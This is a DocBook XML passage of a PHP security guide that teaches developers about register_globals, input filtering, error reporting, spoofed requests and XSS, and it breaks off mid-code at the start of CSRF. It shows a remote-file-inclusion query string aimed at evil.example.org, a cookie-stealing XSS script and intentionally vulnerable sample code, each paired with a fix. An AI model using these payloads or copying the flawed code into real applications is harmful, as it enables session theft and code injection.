<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE book SYSTEM "../../dblite/dblite_htmlents.dtd">

<book id="PHPSEC-GUIDE">
<title>PHP Security Guide</title>

<chapter id="OVERVIEW">
<title>Overview</title>

<sect1 id="WHAT-IS-SECURITY">
<title>What Is Security?</title>
<itemizedlist>
    <listitem>
        <para>Security is a measurement, not a characteristic.</para>
        <para>It is unfortunate that many software projects list security as a
        simple requirement to be met. Is it secure? This question is as
        subjective as asking if something is hot.</para>
    </listitem>
    <listitem>
        <para>Security must be balanced with expense.</para>
        <para>It is easy and relatively inexpensive to provide a sufficient
        level of security for most applications. However, if your security
        needs are very demanding, because you're protecting information that is
        very valuable, then you must achieve a higher level of security at an
        increased cost. This expense must be included in the budget of the
        project.</para>
    </listitem>
    <listitem>
        <para>Security must be balanced with usability.</para>
        <para>It is not uncommon that steps taken to increase the security of
        a web application also decrease the usability. Passwords, session
        timeouts, and access control all create obstacles for a legitimate
        user. Sometimes these are necessary to provide adequate security, but
        there isn't one solution that is appropriate for every application. It
        is wise to be mindful of your legitimate users as you implement
        security measures.</para>
    </listitem>
    <listitem>
        <para>Security must be part of the design.</para>
        <para>If you do not design your application with security in mind, you
        are doomed to be constantly addressing new security vulnerabilities.
        Careful programming cannot make up for a poor design.</para>
    </listitem>
</itemizedlist>
</sect1>

<sect1 id="BASIC-STEPS">
<title>Basic Steps</title>
<itemizedlist>
    <listitem>
        <para>Consider illegitimate uses of your application.</para>
        <para>A secure design is only part of the solution. During
        development, when the code is being written, it is important to
        consider illegitimate uses of your application. Often, the focus is on
        making the application work as intended, and while this is necessary
        to deliver a properly functioning application, it does nothing to help
        make the application secure.</para>
    </listitem>
    <listitem>
        <para>Educate yourself.</para>
        <para>The fact that you are here is evidence that you care about
        security, and as trite as it may sound, this is the most important
        step. There are numerous resources available on the web and in print,
        and several resources are listed in the PHP Security Consortium's
        Library at
        <systemitem role="url">http://phpsec.org/library/</systemitem>.</para>
    </listitem>
    <listitem>
        <para>If nothing else, FILTER ALL EXTERNAL DATA.</para>
        <para>Data filtering is the cornerstone of web application security in
        any language and on any platform. By initializing your variables and
        filtering all data that comes from an external source, you will
        address a majority of security vulnerabilities with very little
        effort. A whitelist approach is better than a blacklist approach. This
        means that you should consider all data invalid unless it can be
        proven valid (rather than considering all data valid unless it can be
        proven invalid).</para>
    </listitem>
</itemizedlist>
</sect1>

<sect1 id="REGISTER-GLOBALS">
<title>Register Globals</title>
<para>The <literal>register_globals</literal> directive is disabled by default
in PHP versions 4.2.0 and greater. While it does not represent a security
vulnerability, it is a security risk. Therefore, you should always develop and
deploy applications with <literal>register_globals</literal> disabled.</para>
<para>Why is it a security risk? It is difficult to produce an example that
convinces everyone, because it often takes a specific situation to make the
risk clear. However, the most common example is the one found in the PHP
manual:</para>
<programlisting>
<![CDATA[<?php 

if (authenticated_user()) 
{ 
    $authorized = true; 
} 

if ($authorized) 
{ 
    include '/highly/sensitive/data.php'; 
} 

?>]]>
</programlisting>
<para>With <literal>register_globals</literal> enabled, this page can be
requested with <literal>?authorized=1</literal> in the query string to bypass
the intended access control. Of course, this particular vulnerability is the
fault of the developer, not <literal>register_globals</literal>, but this
indicates the increased risk posed by the directive. Without it, ordinary
global variables (such as <literal>$authorized</literal> in the example) are
not affected by data submitted by the client. A best practice is to initialize
all variables and to develop with <literal>error_reporting</literal> set to
<literal>E_ALL</literal>, so that the use of an uninitialized variable won't
be overlooked during development.</para>
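<para>As a minimal sketch of that best practice, the same example can be
written with <literal>$authorized</literal> initialized before it is used. The
body of <literal>authenticated_user()</literal> here is only a hypothetical
stand-in, since the original example does not define it:</para>
<programlisting>
<![CDATA[<?php

/* Hypothetical stand-in for the application's real authentication check. */
function authenticated_user()
{
    return false;
}

/* Initialize first, so the value can only come from the code below. */
$authorized = false;

if (authenticated_user())
{
    $authorized = true;
}

if ($authorized)
{
    include '/highly/sensitive/data.php';
}

?>]]>
</programlisting>
<para>Because the assignment happens inside the script, a value supplied as
<literal>?authorized=1</literal> is overwritten before the check, whether or
not <literal>register_globals</literal> is enabled.</para>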
<para>Another example that illustrates how <literal>register_globals</literal>
can be problematic is the following use of <literal>include</literal> with a
dynamic path:</para>
<programlisting>
<![CDATA[<?php

include "$path/script.php";

?>]]>
</programlisting>
<para>With <literal>register_globals</literal> enabled, this page can be
requested with <literal>?path=http%3A%2F%2Fevil.example.org%2F%3F</literal> in
the query string in order to equate this example to the following:</para>
<programlisting>
<![CDATA[<?php

include 'http://evil.example.org/?/script.php';

?>]]>
</programlisting>
<para>If <literal>allow_url_fopen</literal> is enabled (which it is by
default, even in <literal>php.ini-recommended</literal>), this will include
the output of <literal>http://evil.example.org/</literal> just as if it were a
local file. This is a major security vulnerability, and it is one that has
been discovered in some popular open source applications.</para>
<para>Initializing <literal>$path</literal> can mitigate this particular risk,
but so does disabling <literal>register_globals</literal>. Whereas a
developer's mistake can lead to an uninitialized variable, disabling
<literal>register_globals</literal> is a global configuration change that is
far less likely to be overlooked.</para>
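<para>One way to initialize <literal>$path</literal> safely is to derive it
from a fixed list rather than from the request itself. The following is only a
sketch under assumptions: the <literal>module</literal> parameter, the
<literal>module_path()</literal> helper, and the directory names are all
hypothetical.</para>
<programlisting>
<![CDATA[<?php

/* Hypothetical module names and paths, for illustration only. */
function module_path($name)
{
    $modules = array(
        'news'  => '/inc/modules/news',
        'forum' => '/inc/modules/forum',
    );

    /* Only a known key can select a path; anything else is rejected. */
    if (is_string($name) && isset($modules[$name]))
    {
        return $modules[$name];
    }

    return false;
}

$requested = isset($_GET['module']) ? $_GET['module'] : '';
$path = module_path($requested);

if ($path !== false)
{
    include "$path/script.php";
}

?>]]>
</programlisting>
<para>With this arrangement the client can choose among paths that the
developer wrote, but cannot supply a path of its own.</para>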
<para>The convenience of <literal>register_globals</literal> is wonderful, and
those of us who have had to manually
handle form data in the past appreciate this. However, using the
<literal>$_POST</literal> and <literal>$_GET</literal> superglobal arrays is
still very convenient, and it's not worth the added risk to enable
<literal>register_globals</literal>. While I completely disagree with
arguments that equate <literal>register_globals</literal> to poor security, I
do recommend that it be disabled.</para>
<para>In addition to all of this, disabling
<literal>register_globals</literal> encourages developers to be mindful of the
origin of data, and this is an important characteristic of any
security-conscious developer.</para>
</sect1>

<sect1 id="DATA-FILTERING">
<title>Data Filtering</title>
<para>As stated previously, data filtering is the cornerstone of web
application security, and this is independent of programming language or
platform. It involves the mechanism by which you determine the validity of
data that is entering and exiting the application, and a good software design
can help developers to:</para>
<itemizedlist>
    <listitem>
        <para>Ensure that data filtering cannot be bypassed,</para>
    </listitem>
    <listitem>
        <para>Ensure that invalid data cannot be mistaken for valid data,
        and</para>
    </listitem>
    <listitem>
        <para>Identify the origin of data.</para>
    </listitem>
</itemizedlist>
<para>Opinions about how to ensure that data filtering cannot be bypassed
vary, but there are two general approaches that seem to be the most common,
and both of these provide a sufficient level of assurance.</para>
<sect2 id="THE-DISPATCH-METHOD">
<title>The Dispatch Method</title>
<para>One method is to have a single PHP script available directly from the
web (via URL). Everything else is a module included with
<literal>include</literal> or <literal>require</literal> as needed. This
method usually requires that a <literal>GET</literal> variable be passed along
with every URL, identifying the task. This <literal>GET</literal> variable can
be considered the replacement for the script name that would be used in a more
simplistic design. For example:</para>
<programlisting>
<![CDATA[http://example.org/dispatch.php?task=print_form]]>
</programlisting>
<para>The file <literal>dispatch.php</literal> is the only file within
the document root. This allows a developer to do two important things:</para>
<itemizedlist>
    <listitem>
        <para>Implement some global security measures at the top of
        <literal>dispatch.php</literal> and be assured that these measures
        cannot be bypassed.</para>
    </listitem>
    <listitem>
        <para>Easily see that data filtering takes place when necessary, by
        focusing on the control flow of a specific task.</para>
    </listitem>
</itemizedlist>
<para>To further explain this, consider the following example
<literal>dispatch.php</literal> script:</para>
<programlisting>
<![CDATA[<?php

/* Global security measures */

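/* Treat a missing task as an empty one, which falls through to default. */
$task = isset($_GET['task']) ? $_GET['task'] : '';

switch ($task)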
{
    case 'print_form':
        include '/inc/presentation/form.inc';
        break;

    case 'process_form':
        $form_valid = false;
        include '/inc/logic/process.inc';
        if ($form_valid)
        {
            include '/inc/presentation/end.inc';
        }
        else
        {
            include '/inc/presentation/form.inc';
        }
        break;

    default:
        include '/inc/presentation/index.inc';
        break;
}

?>]]>
</programlisting>
<para>If this is the only public PHP script, then it should be clear that the
design of this application ensures that any global security measures taken at
the top cannot be bypassed. It also lets a developer easily see the control
flow for a specific task. For example, instead of glancing through a lot of
code, it is easy to see that <literal>end.inc</literal> is only displayed to a
user when <literal>$form_valid</literal> is <literal>true</literal>, and
because it is initialized as <literal>false</literal> just before
<literal>process.inc</literal> is included, it is clear that the logic within
<literal>process.inc</literal> must set it to <literal>true</literal>,
otherwise the form is displayed again (presumably with appropriate error
messages).</para>
<note><para>If you use a directory index file such as
<literal>index.php</literal> (instead of <literal>dispatch.php</literal>), you
can use URLs such as
<literal>http://example.org/?task=print_form</literal>.</para>
<para>You can also use the Apache <literal>ForceType</literal> directive or
<literal>mod_rewrite</literal> to accommodate URLs such as
<literal>http://example.org/app/print-form</literal>.</para></note>
</sect2>
<sect2 id="THE-INCLUDE-METHOD">
<title>The Include Method</title>
<para>Another approach is to have a single module that is responsible for all
security measures. This module is included at the top (or very near the top)
of all PHP scripts that are public (available via URL). Consider the following
<literal>security.inc</literal> script:</para>
<programlisting>
<![CDATA[<?php

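/* Requests that carry no form identifier match no case below. */
$form = isset($_POST['form']) ? $_POST['form'] : '';

switch ($form)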
{
    case 'login':
        $allowed = array();
        $allowed[] = 'form';
        $allowed[] = 'username';
        $allowed[] = 'password';

        $sent = array_keys($_POST);

        if ($allowed == $sent)
        {
            include '/inc/logic/process.inc';
        }

        break;
}

?>]]>
</programlisting>
<para>In this example, each form that is submitted is expected to have a form
variable named <literal>form</literal> that uniquely identifies it, and
<literal>security.inc</literal> has a separate case to handle the data
filtering for that particular form. An example of an HTML form that fulfills
this requirement is as follows:</para>
<programlisting>
<![CDATA[<form action="/receive.php" method="POST">
<input type="hidden" name="form" value="login" />
<p>Username:
<input type="text" name="username" /></p>
<p>Password:
<input type="password" name="password" /></p>
<input type="submit" />
</form>]]>
</programlisting>
<para>An array named <literal>$allowed</literal> identifies exactly which form
variables are allowed, and the names of the submitted variables must match this
list exactly (same names, in the same order) for the form to be processed.
Control flow is determined elsewhere, and <literal>process.inc</literal> is
where the actual data filtering takes place.</para>
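<para>The comparison in <literal>security.inc</literal> depends on the order in
which the fields arrive. If that is stricter than you need, a variation along
the following lines compares the names regardless of order. The
<literal>fields_match()</literal> helper is a hypothetical name used only for
this sketch:</para>
<programlisting>
<![CDATA[<?php

/*
 * Returns true only when the submitted field names are exactly the
 * allowed ones, regardless of the order in which they were sent.
 */
function fields_match($allowed, $submitted)
{
    $sent = array_keys($submitted);

    /* Sort both lists the same way so that only the names matter. */
    sort($allowed, SORT_STRING);
    sort($sent, SORT_STRING);

    return $allowed === $sent;
}

$allowed = array('form', 'username', 'password');

if (fields_match($allowed, $_POST))
{
    /* The request carries exactly the expected fields. */
}

?>]]>
</programlisting>
<para>A request with a missing field or an extra field still fails the check,
so the whitelist remains exact.</para>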
<note><para>A good way to ensure that <literal>security.inc</literal> is
always included at the top of every PHP script is to use the
<literal>auto_prepend_file</literal> directive.</para></note>
</sect2>
<sect2 id="FILTERING-EXAMPLES">
<title>Filtering Examples</title>
<para>It is important to take a whitelist approach to your data filtering, and
while it is impossible to give examples for every type of form data you may
encounter, a few examples can help to illustrate a sound approach.</para>
<para>The following validates an email address:</para>
<programlisting>
<![CDATA[<?php

$clean = array();

/* The D modifier stops $ from matching before a trailing newline. */
$email_pattern = '/^[^@\s<&>]+@([-a-z0-9]+\.)+[a-z]{2,}$/iD';

if (preg_match($email_pattern, $_POST['email'])) 
{ 
    $clean['email'] = $_POST['email']; 
}

?>]]>
</programlisting>
<para>The following ensures that <literal>$_POST['color']</literal> is
<literal>red</literal>, <literal>green</literal>, or
<literal>blue</literal>:</para>
<programlisting>
<![CDATA[<?php

$clean = array();

switch ($_POST['color'])
{
    case 'red':
    case 'green':
    case 'blue':
        $clean['color'] = $_POST['color'];
        break;
}

?>]]>
</programlisting>
<para>The following example ensures that <literal>$_POST['num']</literal> is
an integer:</para>
<programlisting>
<![CDATA[<?php

$clean = array();

/* Compare as strings; a loose == would also accept values such as "1.0". */
if ($_POST['num'] === strval(intval($_POST['num'])))
{
    $clean['num'] = $_POST['num'];
}

?>]]>
</programlisting>
<para>The following example ensures that <literal>$_POST['num']</literal> is a
float:</para>
<programlisting>
<![CDATA[<?php

$clean = array();

if ($_POST['num'] == strval(floatval($_POST['num'])))
{
    $clean['num'] = $_POST['num'];
}

?>]]>
</programlisting>
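<para>The same approach extends to other kinds of form data. As a further
sketch, the following accepts a username only if it consists of letters and
digits and has a reasonable length. The <literal>username</literal> field, the
<literal>valid_username()</literal> helper, and the 32-character limit are
assumptions chosen for illustration:</para>
<programlisting>
<![CDATA[<?php

$clean = array();

/* Hypothetical rule: 1 to 32 characters, letters and digits only. */
function valid_username($value)
{
    return is_string($value)
        && strlen($value) >= 1
        && strlen($value) <= 32
        && ctype_alnum($value);
}

if (isset($_POST['username']) && valid_username($_POST['username']))
{
    $clean['username'] = $_POST['username'];
}

?>]]>
</programlisting>
<para>Note that <literal>ctype_alnum()</literal> depends on the current
locale, so the exact set of accepted characters can vary between
servers.</para>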
</sect2>
<sect2 id="NAMING-CONVENTIONS">
<title>Naming Conventions</title>
<para>Each of the previous examples makes use of an array named
<literal>$clean</literal>. This illustrates a good practice that can help
developers identify whether data is potentially tainted. You should never make
a practice of validating data and leaving it in <literal>$_POST</literal> or
<literal>$_GET</literal>, because it is important for developers to always be
suspicious of data within these superglobal arrays.</para>
<para>In addition, a more liberal use of <literal>$clean</literal> can allow
you to consider everything else to be tainted, and this more closely resembles
a whitelist approach and therefore offers an increased level of
security.</para>
<para>If you only store data in <literal>$clean</literal> after it has been
validated, the only risk in a failure to validate something is that you might
reference an array element that doesn't exist rather than potentially tainted
data.</para>
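<para>To illustrate, here is a minimal sketch in which the code that uses the
data reads only from <literal>$clean</literal>. The messages are invented for
the example:</para>
<programlisting>
<![CDATA[<?php

$clean = array();

$colors = array('red', 'green', 'blue');

/* Whitelist check: only a known color is copied into $clean. */
if (isset($_POST['color']) && in_array($_POST['color'], $colors, true))
{
    $clean['color'] = $_POST['color'];
}

/* Later code reads only from $clean, never from $_POST. */
if (isset($clean['color']))
{
    $message = "You chose {$clean['color']}.";
}
else
{
    $message = 'Please choose red, green, or blue.';
}

echo $message;

?>]]>
</programlisting>
<para>If the validation step is skipped or fails, the later code finds nothing
in <literal>$clean</literal> and never touches the tainted value.</para>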
</sect2>
<sect2 id="TIMING">
<title>Timing</title>
<para>Once a PHP script begins processing, the entire HTTP request has been
received. This means that the user does not have another opportunity to send
data, and therefore no data can be injected into your script after it starts
(even if <literal>register_globals</literal> is enabled). Any value you assign
in your code therefore replaces whatever the request supplied, which is why
initializing your variables is such a good practice.</para>
</sect2>
</sect1>

<sect1 id="ERROR-REPORTING">
<title>Error Reporting</title>
<para>In versions of PHP prior to PHP 5, released 13 Jul 2004, error reporting
is pretty simplistic. Aside from careful programming, it relies mostly upon a
few specific PHP configuration directives:</para>
<itemizedlist>
    <listitem>
        <para><literal>error_reporting</literal></para>
        <para>This directive sets the level of error reporting desired. It is
        strongly suggested that you set this to <literal>E_ALL</literal> for
        both development and production.</para>
    </listitem>
    <listitem>
        <para><literal>display_errors</literal></para>
        <para>This directive determines whether errors should be displayed on
        the screen (included in the output). You should develop with this set
        to <literal>On</literal>, so that you can be alerted to errors during
        development, and you should set this to <literal>Off</literal> for
        production, so that errors are hidden from the users (and potential
        attackers).</para>
    </listitem>
    <listitem>
        <para><literal>log_errors</literal></para>
        <para>This directive determines whether errors should be written to a
        log. While this may raise performance concerns, errors should be
        rare. If logging errors presents a strain on the disk due
        to the heavy I/O, you probably have larger concerns than the
        performance of your application. You should set this directive to
        <literal>On</literal> in production.</para>
    </listitem>
    <listitem>
        <para><literal>error_log</literal></para>
        <para>This directive indicates the location of the log file to which
        errors are written. Make sure that the web server has write privileges
        for the specified file.</para>
    </listitem>
</itemizedlist>
<para>Having <literal>error_reporting</literal> set to
<literal>E_ALL</literal> will help to enforce the initialization of variables,
because a reference to an undefined variable generates a notice.</para>
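<para>As a rough sketch, the production settings described above could be
applied at the top of a script as follows. The log file path is a hypothetical
example and must be adjusted to a location that the web server can write
to:</para>
<programlisting>
<![CDATA[<?php

/* Report every error level. */
error_reporting(E_ALL);

/* Production-style settings: hide errors from users, but log them. */
ini_set('display_errors', '0');
ini_set('log_errors', '1');

/* Hypothetical log location; the web server needs write access to it. */
ini_set('error_log', '/var/log/php/app_errors.log');

?>]]>
</programlisting>
<para>During development, the only change needed is to set
<literal>display_errors</literal> to <literal>1</literal>.</para>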
<note><para>Each of these directives can be set with
<literal>ini_set()</literal>, in case you do not have access to
<literal>php.ini</literal> or another method of setting these
directives.</para>
<para>A good reference on all error handling and reporting functions is in the
PHP manual:</para>
<para><systemitem role="url">http://www.php.net/manual/en/ref.errorfunc.php</systemitem></para>
<para>PHP 5 includes exception handling. For more information, see:</para>
<para><systemitem role="url">http://www.php.net/manual/language.exceptions.php</systemitem></para></note>
</sect1>
</chapter>

<chapter id="FORM-PROCESSING">
<title>Form Processing</title>

<sect1 id="SPOOFED-FORM-SUBMISSIONS">
<title>Spoofed Form Submissions</title>
<para>In order to appreciate the necessity of data filtering, consider the
following form located (hypothetically speaking) at
<literal>http://example.org/form.html</literal>:</para>
<programlisting>
<![CDATA[<form action="/process.php" method="POST">
<select name="color">
    <option value="red">red</option>
    <option value="green">green</option>
    <option value="blue">blue</option>
</select>
<input type="submit" />
</form>]]>
</programlisting>
<para>Imagine a potential attacker who saves this HTML and modifies it as
follows:</para>
<programlisting>
<![CDATA[<form action="http://example.org/process.php" method="POST">
<input type="text" name="color" />
<input type="submit" />
</form>]]>
</programlisting>
<para>This new form can now be located anywhere (a web server is not even
necessary, since it only needs to be readable by a web browser), and the form
can be manipulated as desired. The absolute URL used in the action attribute
causes the <literal>POST</literal> request to be sent to the same
place.</para>
<para>This makes it very easy to eliminate any client-side restrictions,
whether HTML form restrictions or client-side scripts intended to perform some
rudimentary data filtering. In this particular example,
<literal>$_POST['color']</literal> is not necessarily <literal>red</literal>,
<literal>green</literal>, or <literal>blue</literal>. With a very simple
procedure, any user can create a convenient form that can be used to submit
any data to the URL that processes the form.</para>
</sect1>

<sect1 id="SPOOFED-HTTP-REQUESTS">
<title>Spoofed HTTP Requests</title>
<para>A more powerful, although less convenient, approach is to spoof an HTTP
request. In the example form just discussed, where the user chooses a color,
the resulting HTTP request looks like the following (assuming a choice of
<literal>red</literal>):</para>
<programlisting>
<![CDATA[POST /process.php HTTP/1.1
Host: example.org
Content-Type: application/x-www-form-urlencoded
Content-Length: 9

color=red]]>
</programlisting>
<para>The <literal>telnet</literal> utility can be used to perform some ad hoc
testing. The following example makes a simple <literal>GET</literal> request
for <literal>http://www.php.net/</literal>:</para>
<programlisting>
<![CDATA[$ telnet www.php.net 80
Trying 64.246.30.37...
Connected to rs1.php.net.
Escape character is '^]'.
GET / HTTP/1.1
Host: www.php.net

HTTP/1.1 200 OK
Date: Wed, 21 May 2004 12:34:56 GMT
Server: Apache/1.3.26 (Unix) mod_gzip/1.3.26.1a PHP/4.3.3-dev
X-Powered-By: PHP/4.3.3-dev
Last-Modified: Wed, 21 May 2004 12:34:56 GMT
Content-language: en
Set-Cookie: COUNTRY=USA%2C12.34.56.78; expires=Wed,28-May-04 12:34:56 GMT; path=/; domain=.php.net
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1

2083
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
...]]>
</programlisting>
<para>Of course, you can write your own client instead of manually entering
requests with <literal>telnet</literal>. The following example shows how to
perform the same request using PHP:</para>
<programlisting>
<![CDATA[<?php

$http_response = '';

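$fp = fsockopen('www.php.net', 80);

if (!$fp)
{
    exit('Unable to connect.');
}

fputs($fp, "GET / HTTP/1.1\r\n");
fputs($fp, "Host: www.php.net\r\n");

/* Without this, a keep-alive connection can leave feof() waiting. */
fputs($fp, "Connection: close\r\n\r\n");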

while (!feof($fp))
{
    $http_response .= fgets($fp, 128);
}

fclose($fp);

echo nl2br(htmlentities($http_response));

?>]]>
</programlisting>
<para>Sending your own HTTP requests gives you complete flexibility, and this
demonstrates why server-side data filtering is so essential. Without it, you
have no assurances about any data that originates from any external
source.</para>
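<para>To make this concrete, the following sketch builds a raw
<literal>POST</literal> request for the color form with a value that the form
never offered. The <literal>build_post_request()</literal> helper is a
hypothetical name; the resulting string could be sent with
<literal>fsockopen()</literal> and <literal>fputs()</literal> as in the
previous example:</para>
<programlisting>
<![CDATA[<?php

/*
 * Build a raw HTTP POST request for the given host, path, and form
 * fields. Nothing restricts the field values, which is the point.
 */
function build_post_request($host, $path, $fields)
{
    $pairs = array();

    foreach ($fields as $name => $value)
    {
        $pairs[] = urlencode($name) . '=' . urlencode($value);
    }

    $body = implode('&', $pairs);

    $request  = "POST $path HTTP/1.1\r\n";
    $request .= "Host: $host\r\n";
    $request .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $request .= 'Content-Length: ' . strlen($body) . "\r\n";
    $request .= "Connection: close\r\n\r\n";
    $request .= $body;

    return $request;
}

/* A value that the original select element never offered. */
$fields = array('color' => 'purple');
$request = build_post_request('example.org', '/process.php', $fields);

?>]]>
</programlisting>
<para>From the point of view of <literal>process.php</literal>, this request
looks no different from one produced by the real form.</para>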
</sect1>

<sect1 id="CROSS-SITE-SCRIPTING">
<title>Cross-Site Scripting</title>
<para>The media has helped make cross-site scripting (XSS) a familiar term,
and the attention is deserved. It is one of the most common security
vulnerabilities in web applications, and many popular open source PHP
applications suffer from constant XSS vulnerabilities.</para>
<para>XSS attacks have the following characteristics:</para>
<itemizedlist>
    <listitem>
        <para>Exploit the trust a user has for a particular site.</para>
        <para>Users don't necessarily have a high level of trust for any web
        site, but the browser does. For example, when the browser sends
        cookies in a request, it is trusting the web site. Users may also have
        different browsing habits or even different levels of security defined
        in their browser depending on which site they are visiting.</para>
    </listitem>
    <listitem>
        <para>Generally involve web sites that display external data.</para>
        <para>Applications at a heightened risk include forums, web mail
        clients, and anything that displays syndicated content (such as RSS
        feeds).</para>
    </listitem>
    <listitem>
        <para>Inject content of the attacker's choosing.</para>
        <para>When external data is not properly filtered, you might display
        content of the attacker's choosing. This is just as dangerous as
        letting the attacker edit your source on the server.</para>
    </listitem>
</itemizedlist>
<para>How can this happen? If you display content that comes from any external
source without properly filtering it, you are vulnerable to XSS. External data
isn't limited to data that comes from the client. It also means email
displayed in a web mail client, a banner advertisement, a syndicated blog, and
the like. Any information that is not already in the code comes from an
external source, and this generally means that most data is external
data.</para>
<para>Consider the following example of a simplistic message board:</para>
<programlisting>
<![CDATA[<form>
<input type="text" name="message"><br />
<input type="submit">
</form>

<?php

if (isset($_GET['message']))
{
    $fp = fopen('./messages.txt', 'a');
    fwrite($fp, "{$_GET['message']}<br />");
    fclose($fp);
}

readfile('./messages.txt');

?>]]>
</programlisting>
<para>This message board appends <literal>&lt;br /&gt;</literal> to whatever
the user enters, appends this to a file, then displays the current contents of
the file.</para>
<para>Imagine if a user enters the following message:</para>
<programlisting>
<![CDATA[<script>
document.location = 'http://evil.example.org/steal_cookies.php?cookies=' + document.cookie
</script>]]>
</programlisting>
<para>The next user who visits this message board with JavaScript enabled is
redirected to <literal>evil.example.org</literal>, and any cookies associated
with the current site are included in the query string of the URL.</para>
<para>Of course, a real attacker wouldn't be limited by my lack of creativity
or JavaScript expertise. Feel free to suggest better (more malicious?)
examples.</para>
<para>What can you do? XSS is actually very easy to defend against. Where
things get difficult is when you want to allow some HTML or client-side
scripts to be provided by external sources (such as other users) and
ultimately displayed, but even these situations aren't terribly difficult to
handle. The following best practices can mitigate the risk of XSS:</para>
<itemizedlist>
    <listitem>
        <para>Filter all external data.</para>
        <para>As mentioned earlier, data filtering is the most important
        practice you can adopt. By validating all external data as it enters
        and exits your application, you will mitigate a majority of XSS
        concerns.</para>
    </listitem>
    <listitem>
        <para>Use existing functions.</para>
        <para>Let PHP help with your filtering logic. Functions like
        <literal>htmlentities()</literal>, <literal>strip_tags()</literal>,
        and <literal>utf8_decode()</literal> can be useful. Try to avoid
        reproducing something that a PHP function already does. Not only is
        the built-in function usually faster, but it is also better tested and
        less likely to contain errors that yield vulnerabilities.</para>
    </listitem>
    <listitem>
        <para>Use a whitelist approach.</para>
        <para>Assume data is invalid until it can be proven valid. This
        involves verifying the length and also ensuring that only valid
        characters are allowed. For example, if the user is supplying a last
        name, you might begin by only allowing alphabetic characters and
        spaces. Err on the side of caution. While the names
        <literal>O'Reilly</literal> and <literal>Berners-Lee</literal> will be
        considered invalid, this is easily fixed by adding two more characters
        to the whitelist. It is better to deny valid data than to accept
        malicious data.</para>
    </listitem>
    <listitem>
        <para>Use a strict naming convention.</para>
        <para>As mentioned earlier, a naming convention can help developers
        easily distinguish between filtered and unfiltered data. It is
        important to make things as easy and clear for developers as possible.
        A lack of clarity yields confusion, and this breeds
        vulnerabilities.</para>
    </listitem>
</itemizedlist>
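<para>The whitelist for a last name described above might be sketched as
follows, with the apostrophe and hyphen already added. The
<literal>valid_last_name()</literal> helper, the restriction to ASCII letters,
and the 50-character limit are assumptions made for the example:</para>
<programlisting>
<![CDATA[<?php

/*
 * Hypothetical rule for a last name: 1 to 50 characters made up of
 * ASCII letters, spaces, apostrophes, and hyphens.
 */
function valid_last_name($value)
{
    /* The D modifier keeps $ from matching before a trailing newline. */
    return is_string($value)
        && preg_match('/^[A-Za-z \'-]{1,50}$/D', $value) === 1;
}

$clean = array();

if (isset($_POST['last_name']) && valid_last_name($_POST['last_name']))
{
    $clean['last_name'] = $_POST['last_name'];
}

?>]]>
</programlisting>
<para>This rule still rejects many legitimate names, such as those with
accented letters, which is the trade-off that comes with erring on the side of
caution.</para>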
<para>A much safer version of the simple message board mentioned earlier is as
follows:</para>
<programlisting>
<![CDATA[<form>
<input type="text" name="message"><br />
<input type="submit">
</form>

<?php

if (isset($_GET['message']))
{
    $message = htmlentities($_GET['message']);

    $fp = fopen('./messages.txt', 'a');
    fwrite($fp, "$message<br />");
    fclose($fp);
}

readfile('./messages.txt');

?>]]>
</programlisting>
<para>With the simple addition of <literal>htmlentities()</literal>, the
message board is now much safer. It should not be considered completely
secure, but this is probably the easiest step you can take to provide an
adequate level of protection. Of course, it is highly recommended that you
follow all of the best practices that have been discussed.</para>
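<para>To see what <literal>htmlentities()</literal> does to a hostile message,
consider this small sketch. The <literal>html_escape()</literal> wrapper is a
hypothetical helper, and the explicit <literal>UTF-8</literal> character set is
an assumption about the application:</para>
<programlisting>
<![CDATA[<?php

/* Escape a value for use in HTML element content or quoted attributes. */
function html_escape($value)
{
    return htmlentities($value, ENT_QUOTES, 'UTF-8');
}

$message = "<script>alert('xss')</script>";

/* The angle brackets and quotes are written as character entities. */
echo html_escape($message);

?>]]>
</programlisting>
<para>The browser displays the escaped message as text instead of interpreting
it as a script.</para>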
</sect1>

<sect1 id="CROSS-SITE-REQUEST-FORGERIES">
<title>Cross-Site Request Forgeries</title>

<para>Despite the similarities in name, cross-site request forgeries (CSRF)
are an almost opposite style of attack. Whereas XSS attacks exploit the trust
a user has in a web site, CSRF attacks exploit the trust a web site has in a
user. CSRF attacks are more dangerous, less well known (which means fewer
resources for developers), and more difficult to defend against than XSS
attacks.</para>
<para>CSRF attacks have the following characteristics:</para>
<itemizedlist>
    <listitem>
        <para>Exploit the trust that a site has for a particular user.</para>
        <para>Many users may not be trusted, but it is common for web
        applications to offer users certain privileges upon logging in to the
        application. Users with these heightened privileges are potential
        victims (unknowing accomplices, in fact).</para>
    </listitem>
    <listitem>
        <para>Generally involve web sites that rely on the identity of the
        users.</para>
        <para>It is typical for the identity of a user to carry a lot of
        weight. Even with a secure session management mechanism, which is a
        challenge in itself, CSRF attacks can still be successful. In fact, it
        is in these types of environments where CSRF attacks are most
        potent.</para>
    </listitem>
    <listitem>
        <para>Perform HTTP requests of the attacker's choosing.</para>
        <para>CSRF attacks include all attacks that involve the attacker
        forging an HTTP request from another user (in essence, tricking a user
        into sending an HTTP request on the attacker's behalf). There are a
        few different techniques that can be used to accomplish this, and I
        will show some examples of one specific technique.</para>
    </listitem>
</itemizedlist>
<para>Because CSRF attacks involve the forging of HTTP requests, it is
important to first gain a basic level of familiarity with HTTP.</para>
<para>A web browser is an HTTP client, and a web server is an HTTP server.
Clients initiate a transaction by sending a request, and the server completes
the transaction by sending a response. A typical HTTP request is as
follows:</para>
<programlisting>
<![CDATA[GET / HTTP/1.1
Host: example.org
User-Agent: Mozilla/5.0 Gecko
Accept: text/xml, image/png, image/jpeg, image/gif, */*]]>
</programlisting>
<para>The first line is called the request line, and it contains the request
method, request URL (a relative URL is used), and HTTP version. The other
lines are HTTP headers, and each header name is followed by a colon, a space,
and the value.</para>
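<para>As a simplified sketch of this structure, the following splits a raw
request into the parts just described. The
<literal>parse_http_request()</literal> helper is a hypothetical name, and the
code assumes a well-formed request without a message body:</para>
<programlisting>
<![CDATA[<?php

/*
 * Split a raw HTTP request into its request line parts and headers.
 * A simplified sketch: it assumes well-formed input and ignores any
 * message body.
 */
function parse_http_request($raw)
{
    $lines = explode("\r\n", $raw);

    /* Request line: method, URL, and version separated by spaces. */
    list($method, $url, $version) = explode(' ', array_shift($lines), 3);

    $headers = array();

    foreach ($lines as $line)
    {
        if ($line === '')
        {
            break; /* A blank line ends the headers. */
        }

        /* Header name, a colon, then the value. */
        list($name, $value) = explode(':', $line, 2);
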